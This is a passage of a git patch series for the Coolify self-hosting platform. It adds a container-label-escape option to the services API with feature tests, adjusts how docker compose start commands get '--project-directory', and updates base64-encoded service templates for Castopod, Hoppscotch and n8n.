             $validationMessages = [
                 'urls.*.array' => 'An item in the urls array has invalid fields. Only name and url fields are supported.',
@@ -609,6 +615,9 @@ public function create_service(Request $request)
             $service->destination_id = $destination->id;
             $service->destination_type = $destination->getMorphClass();
             $service->connect_to_docker_network = $connectToDockerNetwork;
+            if ($request->has('is_container_label_escape_enabled')) {
+                $service->is_container_label_escape_enabled = $request->boolean('is_container_label_escape_enabled');
+            }
             $service->save();
 
             $service->parse(isNew: true);
@@ -835,6 +844,7 @@ public function delete_by_uuid(Request $request)
                                 ),
                             ],
                             'force_domain_override' => ['type' => 'boolean', 'default' => false, 'description' => 'Force domain override even if conflicts are detected.'],
+                            'is_container_label_escape_enabled' => ['type' => 'boolean', 'default' => true, 'description' => 'Escape special characters in labels. By default, $ (and other chars) is escaped. If you want to use env variables inside the labels, turn this off.'],
                         ],
                     )
                 ),
@@ -923,7 +933,7 @@ public function update_by_uuid(Request $request)
 
         $this->authorize('update', $service);
 
-        $allowedFields = ['name', 'description', 'instant_deploy', 'docker_compose_raw', 'connect_to_docker_network', 'urls', 'force_domain_override'];
+        $allowedFields = ['name', 'description', 'instant_deploy', 'docker_compose_raw', 'connect_to_docker_network', 'urls', 'force_domain_override', 'is_container_label_escape_enabled'];
 
         $validationRules = [
             'name' => 'string|max:255',
@@ -936,6 +946,7 @@ public function update_by_uuid(Request $request)
             'urls.*.name' => 'string|required',
             'urls.*.url' => 'string|nullable',
             'force_domain_override' => 'boolean',
+            'is_container_label_escape_enabled' => 'boolean',
         ];
         $validationMessages = [
             'urls.*.array' => 'An item in the urls array has invalid fields. Only name and url fields are supported.',
@@ -1001,6 +1012,9 @@ public function update_by_uuid(Request $request)
         if ($request->has('connect_to_docker_network')) {
             $service->connect_to_docker_network = $request->connect_to_docker_network;
         }
+        if ($request->has('is_container_label_escape_enabled')) {
+            $service->is_container_label_escape_enabled = $request->boolean('is_container_label_escape_enabled');
+        }
         $service->save();
 
         $service->parse();
diff --git a/tests/Feature/ServiceContainerLabelEscapeApiTest.php b/tests/Feature/ServiceContainerLabelEscapeApiTest.php
new file mode 100644
index 000000000..895d776f0
--- /dev/null
+++ b/tests/Feature/ServiceContainerLabelEscapeApiTest.php
@@ -0,0 +1,75 @@
+<?php
+
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    InstanceSettings::create(['id' => 0, 'is_api_enabled' => true]);
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    session(['currentTeam' => $this->team]);
+
+    $this->token = $this->user->createToken('test-token', ['*']);
+    $this->bearerToken = $this->token->plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = $this->project->environments()->first();
+});
+
+function serviceContainerLabelAuthHeaders($bearerToken): array
+{
+    return [
+        'Authorization' => 'Bearer '.$bearerToken,
+        'Content-Type' => 'application/json',
+    ];
+}
+
+describe('PATCH /api/v1/services/{uuid}', function () {
+    test('accepts is_container_label_escape_enabled field', function () {
+        $service = Service::factory()->create([
+            'server_id' => $this->server->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+            'environment_id' => $this->environment->id,
+        ]);
+
+        $response = $this->withHeaders(serviceContainerLabelAuthHeaders($this->bearerToken))
+            ->patchJson("/api/v1/services/{$service->uuid}", [
+                'is_container_label_escape_enabled' => false,
+            ]);
+
+        $response->assertStatus(200);
+
+        $service->refresh();
+        expect($service->is_container_label_escape_enabled)->toBeFalse();
+    });
+
+    test('rejects invalid is_container_label_escape_enabled value', function () {
+        $service = Service::factory()->create([
+            'server_id' => $this->server->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+            'environment_id' => $this->environment->id,
+        ]);
+
+        $response = $this->withHeaders(serviceContainerLabelAuthHeaders($this->bearerToken))
+            ->patchJson("/api/v1/services/{$service->uuid}", [
+                'is_container_label_escape_enabled' => 'not-a-boolean',
+            ]);
+
+        $response->assertStatus(422);
+    });
+});

From a97612b29e8f7194a4e4c57cc3cd932bce1e43b7 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 13 Mar 2026 13:53:03 +0100
Subject: [PATCH 062/213] fix(docker-compose): respect preserveRepository when
 injecting --project-directory

When adding --project-directory to custom docker compose start commands,
use the application's host workdir if preserveRepository is true, otherwise
use the container workdir. Add tests for both scenarios and explicit paths.
---
 app/Jobs/ApplicationDeploymentJob.php         |  3 +-
 templates/service-templates-latest.json       |  8 +--
 templates/service-templates.json              |  8 +--
 ...posePreserveRepositoryStartCommandTest.php | 49 +++++++++++++++++++
 4 files changed, 59 insertions(+), 9 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index fcd619fd4..f84cdceb9 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -573,7 +573,8 @@ private function deploy_docker_compose_buildpack()
         if (data_get($this->application, 'docker_compose_custom_start_command')) {
             $this->docker_compose_custom_start_command = $this->application->docker_compose_custom_start_command;
             if (! str($this->docker_compose_custom_start_command)->contains('--project-directory')) {
-                $this->docker_compose_custom_start_command = str($this->docker_compose_custom_start_command)->replaceFirst('compose', 'compose --project-directory '.$this->workdir)->value();
+                $projectDir = $this->preserveRepository ? $this->application->workdir() : $this->workdir;
+                $this->docker_compose_custom_start_command = str($this->docker_compose_custom_start_command)->replaceFirst('compose', 'compose --project-directory '.$projectDir)->value();
             }
         }
         if (data_get($this->application, 'docker_compose_custom_build_command')) {
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index 2ea3ce8c5..bc05073d1 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -489,7 +489,7 @@
     "castopod": {
         "documentation": "https://docs.castopod.org/main/en/?utm_source=coolify.io",
         "slogan": "Castopod is a free & open-source hosting platform made for podcasters who want engage and interact with their audience.",
-        "compose": "c2VydmljZXM6CiAgY2FzdG9wb2Q6CiAgICBpbWFnZTogJ2Nhc3RvcG9kL2Nhc3RvcG9kOmxhdGVzdCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLW1lZGlhOi92YXIvd3d3L2Nhc3RvcG9kL3B1YmxpYy9tZWRpYScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0NBU1RPUE9EXzgwMDAKICAgICAgLSBNWVNRTF9EQVRBQkFTRT1jYXN0b3BvZAogICAgICAtIE1ZU1FMX1VTRVI9JFNFUlZJQ0VfVVNFUl9NWVNRTAogICAgICAtIE1ZU1FMX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX01ZU1FMCiAgICAgIC0gJ0NQX0RJU0FCTEVfSFRUUFM9JHtDUF9ESVNBQkxFX0hUVFBTOi0xfScKICAgICAgLSBDUF9CQVNFVVJMPSRTRVJWSUNFX1VSTF9DQVNUT1BPRAogICAgICAtIENQX0FOQUxZVElDU19TQUxUPSRTRVJWSUNFX1JFQUxCQVNFNjRfNjRfU0FMVAogICAgICAtIENQX0NBQ0hFX0hBTkRMRVI9cmVkaXMKICAgICAgLSBDUF9SRURJU19IT1NUPXJlZGlzCiAgICAgIC0gQ1BfUkVESVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovL2xvY2FsaG9zdDo4MDAwL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgbWFyaWFkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIG1hcmlhZGI6CiAgICBpbWFnZTogJ21hcmlhZGI6MTEuMicKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLWRiOi92YXIvbGliL215c3FsJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTVlTUUxfUk9PVF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgICAtIE1ZU1FMX0RBVEFCQVNFPWNhc3RvcG9kCiAgICAgIC0gTVlTUUxfVVNFUj0kU0VSVklDRV9VU0VSX01ZU1FMCiAgICAgIC0gTVlTUUxfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUwKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBoZWFsdGhjaGVjay5zaAogICAgICAgIC0gJy0tY29ubmVjdCcKICAgICAgICAtICctLWlubm9kYl9pbml0aWFsaXplZCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo3LjItYWxwaW5lJwogICAgY29tbWFuZDogJy0tcmVxdWlyZXBhc3MgJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMnCiAgICB2b2x1bWVzOgogICAgICAtICdjYXN0b3BvZC1jYWNoZTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIC1hICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTIHBpbmcgfCBncmVwIFBPTkcnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
+        "compose": "c2VydmljZXM6CiAgY2FzdG9wb2Q6CiAgICBpbWFnZTogJ2Nhc3RvcG9kL2Nhc3RvcG9kOjEuMTUuNCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLW1lZGlhOi92YXIvd3d3L2Nhc3RvcG9kL3B1YmxpYy9tZWRpYScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0NBU1RPUE9EXzgwODAKICAgICAgLSBNWVNRTF9EQVRBQkFTRT1jYXN0b3BvZAogICAgICAtIE1ZU1FMX1VTRVI9JFNFUlZJQ0VfVVNFUl9NWVNRTAogICAgICAtIE1ZU1FMX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX01ZU1FMCiAgICAgIC0gJ0NQX0RJU0FCTEVfSFRUUFM9JHtDUF9ESVNBQkxFX0hUVFBTOi0xfScKICAgICAgLSBDUF9CQVNFVVJMPSRTRVJWSUNFX1VSTF9DQVNUT1BPRAogICAgICAtIENQX0FOQUxZVElDU19TQUxUPSRTRVJWSUNFX1JFQUxCQVNFNjRfNjRfU0FMVAogICAgICAtIENQX0NBQ0hFX0hBTkRMRVI9cmVkaXMKICAgICAgLSBDUF9SRURJU19IT1NUPXJlZGlzCiAgICAgIC0gQ1BfUkVESVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovL2xvY2FsaG9zdDo4MDgwL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgbWFyaWFkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIG1hcmlhZGI6CiAgICBpbWFnZTogJ21hcmlhZGI6MTEuMicKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLWRiOi92YXIvbGliL215c3FsJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTVlTUUxfUk9PVF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgICAtIE1ZU1FMX0RBVEFCQVNFPWNhc3RvcG9kCiAgICAgIC0gTVlTUUxfVVNFUj0kU0VSVklDRV9VU0VSX01ZU1FMCiAgICAgIC0gTVlTUUxfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfTVlTUUwKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBoZWFsdGhjaGVjay5zaAogICAgICAgIC0gJy0tY29ubmVjdCcKICAgICAgICAtICctLWlubm9kYl9pbml0aWFsaXplZCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo3LjItYWxwaW5lJwogICAgY29tbWFuZDogJy0tcmVxdWlyZXBhc3MgJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMnCiAgICB2b2x1bWVzOgogICAgICAtICdjYXN0b3BvZC1jYWNoZTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIC1hICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTIHBpbmcgfCBncmVwIFBPTkcnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
         "tags": [
             "podcast",
             "media",
@@ -503,7 +503,7 @@
         "category": "media",
         "logo": "svgs/castopod.svg",
         "minversion": "0.0.0",
-        "port": "8000"
+        "port": "8080"
     },
     "changedetection": {
         "documentation": "https://github.com/dgtlmoon/changedetection.io/?utm_source=coolify.io",
@@ -2030,7 +2030,7 @@
     "hoppscotch": {
         "documentation": "https://docs.hoppscotch.io?utm_source=coolify.io",
         "slogan": "The Open Source API Development Platform",
-        "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnaG9wcHNjb3RjaC9ob3Bwc2NvdGNoOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0hPUFBTQ09UQ0hfODAKICAgICAgLSAnVklURV9BTExPV0VEX0FVVEhfUFJPVklERVJTPSR7VklURV9BTExPV0VEX0FVVEhfUFJPVklERVJTOi1HT09HTEUsR0lUSFVCLE1JQ1JPU09GVCxFTUFJTH0nCiAgICAgIC0gJ0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AaG9wcHNjb3RjaC1kYjo1NDMyLyR7UE9TVEdSRVNfREJ9JwogICAgICAtICdEQVRBX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9CQVNFNjRfREFUQUVOQ1JZUFRJT05LRVl9JwogICAgICAtICdXSElURUxJU1RFRF9PUklHSU5TPSR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0vYmFja2VuZCwke1NFUlZJQ0VfVVJMX0hPUFBTQ09UQ0h9LCR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0vYWRtaW4nCiAgICAgIC0gJ01BSUxFUl9VU0VfQ1VTVE9NX0NPTkZJR1M9JHtNQUlMRVJfVVNFX0NVU1RPTV9DT05GSUdTOi10cnVlfScKICAgICAgLSAnVklURV9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX0hPUFBTQ09UQ0h9JwogICAgICAtICdWSVRFX1NIT1JUQ09ERV9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX0hPUFBTQ09UQ0h9JwogICAgICAtICdWSVRFX0FETUlOX1VSTD0ke1NFUlZJQ0VfVVJMX0hPUFBTQ09UQ0h9L2FkbWluJwogICAgICAtICdWSVRFX0JBQ0tFTkRfR1FMX1VSTD0ke1NFUlZJQ0VfVVJMX0hPUFBTQ09UQ0h9L2JhY2tlbmQvZ3JhcGhxbCcKICAgICAgLSAnVklURV9CQUNLRU5EX1dTX1VSTD13c3M6Ly8ke1NFUlZJQ0VfRlFETl9IT1BQU0NPVENIfS9iYWNrZW5kL2dyYXBocWwnCiAgICAgIC0gJ1ZJVEVfQkFDS0VORF9BUElfVVJMPSR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0vYmFja2VuZC92MScKICAgICAgLSAnVklURV9BUFBfVE9TX0xJTks9aHR0cHM6Ly9kb2NzLmhvcHBzY290Y2guaW8vc3VwcG9ydC90ZXJtcycKICAgICAgLSAnVklURV9BUFBfUFJJVkFDWV9QT0xJQ1lfTElOSz1odHRwczovL2RvY3MuaG9wcHNjb3RjaC5pby9zdXBwb3J0L3ByaXZhY3knCiAgICAgIC0gRU5BQkxFX1NVQlBBVEhfQkFTRURfQUNDRVNTPXRydWUKICAgIGRlcGVuZHNfb246CiAgICAgIGRiLW1pZ3JhdGlvbjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfY29tcGxldGVkX3N1Y2Nlc3NmdWxseQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo4MC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBob3Bwc2NvdGNoLWRiOgogICAgaW1hZ2U6ICdwb3N0Z3JlczpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotaG9wcHNjb3RjaH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLWggbG9jYWxob3N0IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxMAogIGRiLW1pZ3JhdGlvbjoKICAgIGV4Y2x1ZGVfZnJvbV9oYzogdHJ1ZQogICAgaW1hZ2U6ICdob3Bwc2NvdGNoL2hvcHBzY290Y2g6bGF0ZXN0JwogICAgZGVwZW5kc19vbjoKICAgICAgaG9wcHNjb3RjaC1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgY29tbWFuZDogJ3BucHggcHJpc21hIG1pZ3JhdGUgZGVwbG95JwogICAgcmVzdGFydDogb24tZmFpbHVyZQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1ob3Bwc2NvdGNofScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AaG9wcHNjb3RjaC1kYjo1NDMyLyR7UE9TVEdSRVNfREI6LWhvcHBzY290Y2h9Jwo=",
+        "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnaG9wcHNjb3RjaC9ob3Bwc2NvdGNoOjIwMjYuMi4xJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfSE9QUFNDT1RDSF84MAogICAgICAtICdWSVRFX0FMTE9XRURfQVVUSF9QUk9WSURFUlM9JHtWSVRFX0FMTE9XRURfQVVUSF9QUk9WSURFUlM6LUdPT0dMRSxHSVRIVUIsTUlDUk9TT0ZULEVNQUlMfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBob3Bwc2NvdGNoLWRiOjU0MzIvJHtQT1NUR1JFU19EQn0nCiAgICAgIC0gJ0RBVEFfRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX0JBU0U2NF9EQVRBRU5DUllQVElPTktFWX0nCiAgICAgIC0gJ1dISVRFTElTVEVEX09SSUdJTlM9JHtTRVJWSUNFX1VSTF9IT1BQU0NPVENIfS9iYWNrZW5kLCR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0sJHtTRVJWSUNFX1VSTF9IT1BQU0NPVENIfS9hZG1pbicKICAgICAgLSAnTUFJTEVSX1VTRV9DVVNUT01fQ09ORklHUz0ke01BSUxFUl9VU0VfQ1VTVE9NX0NPTkZJR1M6LXRydWV9JwogICAgICAtICdWSVRFX0JBU0VfVVJMPSR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0nCiAgICAgIC0gJ1ZJVEVfU0hPUlRDT0RFX0JBU0VfVVJMPSR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0nCiAgICAgIC0gJ1ZJVEVfQURNSU5fVVJMPSR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0vYWRtaW4nCiAgICAgIC0gJ1ZJVEVfQkFDS0VORF9HUUxfVVJMPSR7U0VSVklDRV9VUkxfSE9QUFNDT1RDSH0vYmFja2VuZC9ncmFwaHFsJwogICAgICAtICdWSVRFX0JBQ0tFTkRfV1NfVVJMPXdzczovLyR7U0VSVklDRV9GUUROX0hPUFBTQ09UQ0h9L2JhY2tlbmQvZ3JhcGhxbCcKICAgICAgLSAnVklURV9CQUNLRU5EX0FQSV9VUkw9JHtTRVJWSUNFX1VSTF9IT1BQU0NPVENIfS9iYWNrZW5kL3YxJwogICAgICAtICdWSVRFX0FQUF9UT1NfTElOSz1odHRwczovL2RvY3MuaG9wcHNjb3RjaC5pby9zdXBwb3J0L3Rlcm1zJwogICAgICAtICdWSVRFX0FQUF9QUklWQUNZX1BPTElDWV9MSU5LPWh0dHBzOi8vZG9jcy5ob3Bwc2NvdGNoLmlvL3N1cHBvcnQvcHJpdmFjeScKICAgICAgLSBFTkFCTEVfU1VCUEFUSF9CQVNFRF9BQ0NFU1M9dHJ1ZQogICAgZGVwZW5kc19vbjoKICAgICAgZGItbWlncmF0aW9uOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9jb21wbGV0ZWRfc3VjY2Vzc2Z1bGx5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjgwLycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIGhvcHBzY290Y2gtZGI6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE1JwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWhvcHBzY290Y2h9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1oIGxvY2FsaG9zdCAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTAKICBkYi1taWdyYXRpb246CiAgICBleGNsdWRlX2Zyb21faGM6IHRydWUKICAgIGltYWdlOiAnaG9wcHNjb3RjaC9ob3Bwc2NvdGNoOjIwMjYuMi4xJwogICAgZGVwZW5kc19vbjoKICAgICAgaG9wcHNjb3RjaC1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgY29tbWFuZDogJ3BucHggcHJpc21hIG1pZ3JhdGUgZGVwbG95JwogICAgcmVzdGFydDogb24tZmFpbHVyZQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1ob3Bwc2NvdGNofScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AaG9wcHNjb3RjaC1kYjo1NDMyLyR7UE9TVEdSRVNfREI6LWhvcHBzY290Y2h9Jwo=",
         "tags": [
             "api",
             "development",
@@ -2884,7 +2884,7 @@
     "n8n-with-postgres-and-worker": {
         "documentation": "https://n8n.io?utm_source=coolify.io",
         "slogan": "n8n is an extendable workflow automation tool with queue mode and workers.",
-        "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICduOG5pby9uOG46Mi4xMC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdOOE5fUFJPVE9DT0w9JHtOOE5fUFJPVE9DT0w6LWh0dHBzfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LVVUQ30nCiAgICAgIC0gJ1RaPSR7VFo6LVVUQ30nCiAgICAgIC0gREJfVFlQRT1wb3N0Z3Jlc2RiCiAgICAgIC0gJ0RCX1BPU1RHUkVTREJfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotbjhufScKICAgICAgLSBEQl9QT1NUR1JFU0RCX0hPU1Q9cG9zdGdyZXNxbAogICAgICAtIERCX1BPU1RHUkVTREJfUE9SVD01NDMyCiAgICAgIC0gREJfUE9TVEdSRVNEQl9VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1NDSEVNQT1wdWJsaWMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gRVhFQ1VUSU9OU19NT0RFPXF1ZXVlCiAgICAgIC0gUVVFVUVfQlVMTF9SRURJU19IT1NUPXJlZGlzCiAgICAgIC0gUVVFVUVfSEVBTFRIX0NIRUNLX0FDVElWRT10cnVlCiAgICAgIC0gJ044Tl9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfRU5DUllQVElPTn0nCiAgICAgIC0gTjhOX1JVTk5FUlNfRU5BQkxFRD10cnVlCiAgICAgIC0gTjhOX1JVTk5FUlNfTU9ERT1leHRlcm5hbAogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M9JHtOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M6LTAuMC4wLjB9JwogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfUE9SVD0ke044Tl9SVU5ORVJTX0JST0tFUl9QT1JUOi01Njc5fScKICAgICAgLSBOOE5fUlVOTkVSU19BVVRIX1RPS0VOPSRTRVJWSUNFX1BBU1NXT1JEX044TgogICAgICAtICdOOE5fTkFUSVZFX1BZVEhPTl9SVU5ORVI9JHtOOE5fTkFUSV